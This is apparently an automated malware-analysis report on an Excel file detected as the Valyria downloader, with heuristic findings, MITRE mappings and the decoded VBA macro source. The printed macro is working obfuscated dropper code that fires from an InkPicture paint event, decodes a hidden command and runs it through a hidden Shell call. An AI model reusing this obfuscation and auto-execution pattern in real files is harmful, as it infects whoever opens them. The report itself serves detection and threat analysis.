MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
This Excel document contains VBA macros that leverage the Shell() function to execute arbitrary code, as indicated by the 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics. The ClamAV detection name 'Xls.Downloader.Valyria-6704496-0' strongly suggests the 'Valyria' family and its downloader functionality. The VBA script's primary purpose is to download and execute a second-stage payload.
Heuristics 5
-
ClamAV: Xls.Downloader.Valyria-6704496-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Downloader.Valyria-6704496-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.day.com/dam/1.0 In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4944 bytes |
SHA-256: e8a328e33eef3d72b30a80fd30f86576fc7f6b101c177ae850ded73563848ba8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "InkPicture1, 84, 0, MSINKAUTLib, InkPicture"
Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
Message = "er"
getErrorMessages Message, 2, 25
End Sub
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "REG_ERR"
Attribute VB_Base = "0{C89719B9-9B3C-409E-B420-247EAF574836}{8E4558ED-C173-443C-8EDA-7A2B8C08EB26}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub bStackBelowHeap_Change()
cfgfolder = REG_ERR.bStackBelowHeap
dwVar = 100
dwVar = 99
dwVar = 98
dwVar = 97
dwVar = 96
dwVar = 95
dwVar = 94
dwVar = 93
dwVar = 92
dwVar = 91
dwVar = 90
dwVar = 89
dwVar = 88
dwVar = 87
dwVar = 86
dwVar = 85
dwVar = 84
dwVar = 83
dwVar = 82
dwVar = 81
dwVar = 80
dwVar = 79
dwVar = 78
dwVar = 0
Shell cfgfolder, 0
End Sub
Private Sub been_Change()
not1
End Sub
Attribute VB_Name = "must"
Public Sub not1()
fad = 101
On Error Resume Next
fad = CInt("30E+10000")
If fad = 101 Then
REG_ERR.pSymFunctionTableAccess64 = iter(REG_ERR.drov, 1, 2, 3)
REG_ERR.bStackBelowHeap = REG_ERR.pSymFunctionTableAccess64
End If
End Sub
Attribute VB_Name = "main"
Public Sub getErrorMessages(file, arg2, arg3)
REG_ERR.been = file
End Sub
Attribute VB_Name = "basedefs"
Sub test()
dwVar = 100
dwVar = 99
dwVar = 98
dwVar = 97
dwVar = 96
dwVar = 95
dwVar = 94
dwVar = 93
dwVar = 92
dwVar = 91
dwVar = 90
dwVar = 89
dwVar = 88
dwVar = 87
dwVar = 86
dwVar = 85
dwVar = 84
dwVar = 83
dwVar = 82
dwVar = 81
dwVar = 80
dwVar = 79
dwVar = 78
dwVar = 0
End Sub
Function iter(TODO, p1, p2, p3)
dependency = ""
CYGWIN = 1
CYGWIN = 100
CYGWIN = 99
CYGWIN = 98
CYGWIN = 97
CYGWIN = 96
CYGWIN = 95
CYGWIN = 94
CYGWIN = 93
CYGWIN = 92
CYGWIN = 91
CYGWIN = 90
CYGWIN = 89
CYGWIN = 88
CYGWIN = 87
CYGWIN = 86
CYGWIN = 85
CYGWIN = 84
CYGWIN = 83
CYGWIN = 82
CYGWIN = 81
CYGWIN = 80
CYGWIN = 79
CYGWIN = 78
CYGWIN = 1 - 0
GetExceptionCode CYGWIN, dependency, TODO
iter = dependency
End Function
Private Sub GetExceptionCode(ByRef C, ByRef fpUnDecorateSymbolName, contrary)
BUS_MCEERR_AO = Len(contrary)
If C <= BUS_MCEERR_AO Then
fpUnDecorateSymbolName = fpUnDecorateSymbolName + xml(PIMAGEHLP_SYMBOL64(Right(Left(contrary, C), 1)), 4)
C = C + 1
GetExceptionCode C, fpUnDecorateSymbolName, contrary
End If
End Sub
Function xml(pUnDecorateSymbolName, oss)
If pUnDecorateSymbolName - oss < 1 Then
xml = Right(Left(REG_ERR.General, Len(REG_ERR.General) + pUnDecorateSymbolName - oss), 1)
Else
xml = Right(Left(REG_ERR.General, pUnDecorateSymbolName - oss), 1)
End If
End Function
Function PIMAGEHLP_SYMBOL64(entries)
LPSTACKFRAME64 = 1
Signalmap_t = 1
alignment LPSTACKFRAME64, Signalmap_t,
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.